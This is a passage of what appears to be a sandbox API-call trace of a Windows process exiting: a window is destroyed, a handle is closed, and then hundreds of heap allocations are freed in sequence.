(hWnd=0x9011a) returned 1 [0135.221] DestroyWindow (hWnd=0x9011a) returned 1 [0135.221] NtdllDefWindowProc_W () returned 0x0 [0135.221] PostQuitMessage (nExitCode=0) [0135.222] NtdllDefWindowProc_W () returned 0x0 [0135.222] CloseHandle (hObject=0x5cc) returned 1 [0135.222] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49ba700 | out: hHeap=0x4970000) returned 1 [0135.222] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b000 | out: hHeap=0x4970000) returned 1 [0135.222] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750af60 | out: hHeap=0x4970000) returned 1 [0135.222] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b050 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b140 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b168 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b190 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c3588 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c3668 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b1b8 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b1e0 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b208 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b230 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b258 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b280 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b2a8 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c3630 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c3780 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b2d0 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b2f8 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b320 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b348 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b370 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b398 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b3c0 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b3e8 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750bdd0 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750be08 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b410 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b438 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b460 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b488 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b4b0 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b4d8 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b500 | out: hHeap=0x4970000) returned 1 [0135.223] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b528 | out: hHeap=0x4970000) returned 1 [0135.224] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750be40 | out: hHeap=0x4970000) returned 1 [0135.224] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750be78 | out: hHeap=0x4970000) returned 1 [0135.224] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b550 | out: hHeap=0x4970000) returned 1 [0135.224] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b578 | out: hHeap=0x4970000) returned 1 [0135.224] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b5a0 | out: hHeap=0x4970000) returned 1 [0135.224] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b5c8 | out: hHeap=0x4970000) returned 1 [0135.224] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750b5f0 | out: hHeap=0x4970000) returned 1 [0135.224] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7517ea8 | out: hHeap=0x4970000) returned 1 [0135.224] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fa4f0 | out: hHeap=0x4970000) returned 1 [0135.224] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74f21d8 | out: hHeap=0x4970000) returned 1 [0135.224] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74a5668 | out: hHeap=0x4970000) returned 1 [0135.224] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74eab88 | out: hHeap=0x4970000) returned 1 [0135.224] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c3828 | out: hHeap=0x4970000) returned 1 [0135.225] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5df0 | out: hHeap=0x4970000) returned 1 [0135.225] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5da8 | out: hHeap=0x4970000) returned 1 [0135.225] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd35040 | out: hHeap=0x4970000) returned 1 [0135.225] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd34ff8 | out: hHeap=0x4970000) returned 1 [0135.225] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750c9a0 | out: hHeap=0x4970000) returned 1 [0135.225] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750c8f8 | out: hHeap=0x4970000) returned 1 [0135.225] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49c5028 | out: hHeap=0x4970000) returned 1 [0135.225] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49c1868 | out: hHeap=0x4970000) returned 1 [0135.225] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e8538 | out: hHeap=0x4970000) returned 1 [0135.225] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x498e0b0 | out: hHeap=0x4970000) returned 1 [0135.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74beff8 | out: hHeap=0x4970000) returned 1 [0135.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7540680 | out: hHeap=0x4970000) returned 1 [0135.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7540f08 | out: hHeap=0x4970000) returned 1 [0135.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x754e780 | out: hHeap=0x4970000) returned 1 [0135.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x754f008 | out: hHeap=0x4970000) returned 1 [0135.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a5f9c8 | out: hHeap=0x4970000) returned 1 [0135.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x753fdf8 | out: hHeap=0x4970000) returned 1 [0135.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7524a38 | out: hHeap=0x4970000) returned 1 [0135.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7524220 | out: hHeap=0x4970000) returned 1 [0135.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7523a08 | out: hHeap=0x4970000) returned 1 [0135.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75231f0 | out: hHeap=0x4970000) returned 1 [0135.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75229d8 | out: hHeap=0x4970000) returned 1 [0135.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75221c0 | out: hHeap=0x4970000) returned 1 [0135.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75219a8 | out: hHeap=0x4970000) returned 1 [0135.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74826a8 | out: hHeap=0x4970000) returned 1 [0135.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7525260 | out: hHeap=0x4970000) returned 1 [0135.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7525a88 | out: hHeap=0x4970000) returned 1 [0135.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75262c0 | out: hHeap=0x4970000) returned 1 [0135.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7526af8 | out: hHeap=0x4970000) returned 1 [0135.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7527330 | out: hHeap=0x4970000) returned 1 [0135.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7527b68 | out: hHeap=0x4970000) returned 1 [0135.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75283b0 | out: hHeap=0x4970000) returned 1 [0135.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7528bd8 | out: hHeap=0x4970000) returned 1 [0135.226] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7529400 | out: hHeap=0x4970000) returned 1 [0135.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x752a4a0 | out: hHeap=0x4970000) returned 1 [0135.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x752b120 | out: hHeap=0x4970000) returned 1 [0135.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7518780 | out: hHeap=0x4970000) returned 1 [0135.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x752bda0 | out: hHeap=0x4970000) returned 1 [0135.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x752c5c8 | out: hHeap=0x4970000) returned 1 [0135.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x752ce10 | out: hHeap=0x4970000) returned 1 [0135.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x752d658 | out: hHeap=0x4970000) returned 1 [0135.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x752de90 | out: hHeap=0x4970000) returned 1 [0135.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x752e6c8 | out: hHeap=0x4970000) returned 1 [0135.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x752ef00 | out: hHeap=0x4970000) returned 1 [0135.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x752f728 | out: hHeap=0x4970000) returned 1 [0135.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x752ff50 | out: hHeap=0x4970000) returned 1 [0135.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7530778 | out: hHeap=0x4970000) returned 1 [0135.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7530fb0 | out: hHeap=0x4970000) returned 1 [0135.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75317e8 | out: hHeap=0x4970000) returned 1 [0135.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7532028 | out: hHeap=0x4970000) returned 1 [0135.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7542868 | out: hHeap=0x4970000) returned 1 [0135.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75434e8 | out: hHeap=0x4970000) returned 1 [0135.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75328b0 | out: hHeap=0x4970000) returned 1 [0135.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7533138 | out: hHeap=0x4970000) returned 1 [0135.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7542010 | out: hHeap=0x4970000) returned 1 [0135.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7544168 | out: hHeap=0x4970000) returned 1 [0135.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75449b0 | out: hHeap=0x4970000) returned 1 [0135.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7529c48 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75451f8 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7545a30 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75339c0 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7534248 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7534ad0 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7546a98 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7547b08 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7535358 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7548340 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7548fc0 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7535be0 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7536468 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7549c40 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x754acb8 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x754bd48 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7537578 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7537e00 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7538688 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7536cf0 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7538f10 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7539798 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x753a020 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x753b130 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x753a8a8 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x754ce68 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x754dae8 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x753b9b8 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x753c240 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x753d350 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x754b500 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x753dbd8 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x753e460 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x753ece8 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x753cac8 | out: hHeap=0x4970000) returned 1 [0135.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x753f570 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x754c590 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74eff28 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a5f8f8 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x751b0c8 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74f9cc8 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74eb390 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74ea290 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74b6528 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd0060 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd08e8 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd1170 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd19f8 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a5fa30 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7572958 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x754a478 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7576cd0 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75774e8 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7577d00 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7578518 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7578d30 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75731e0 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e6708 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7550118 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75509a0 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7551228 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7551ab0 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7552338 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7520a38 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7552bc0 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7553448 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x755f7e0 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7560028 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7560890 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7553cd0 | out: hHeap=0x4970000) returned 1 [0135.232] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7554558 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75610f8 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7561940 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7554de0 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7555668 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7555ef0 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7556778 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7557000 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7557888 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7558110 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7558998 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7559220 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7559aa8 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7562188 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75629f0 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x755a330 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x755abb8 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x755b440 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7563258 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7563aa0 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x755bcc8 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x755c550 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x755cdd8 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x755d660 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7564300 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7564b88 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7565410 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7565c98 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7566520 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75742e8 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7574b50 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7566da8 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7567630 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7567eb8 | out: hHeap=0x4970000) returned 1 [0135.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75753b8 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7568740 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7568fc8 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7569850 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x756a0d8 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x756a960 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x756b1e8 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x756ba70 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x756c2f8 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x756cb80 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x756d408 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7575c00 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7576468 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x756dc90 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x756e518 | out: hHeap=0x4970000) returned 1 [0135.234] HeapFree (in: 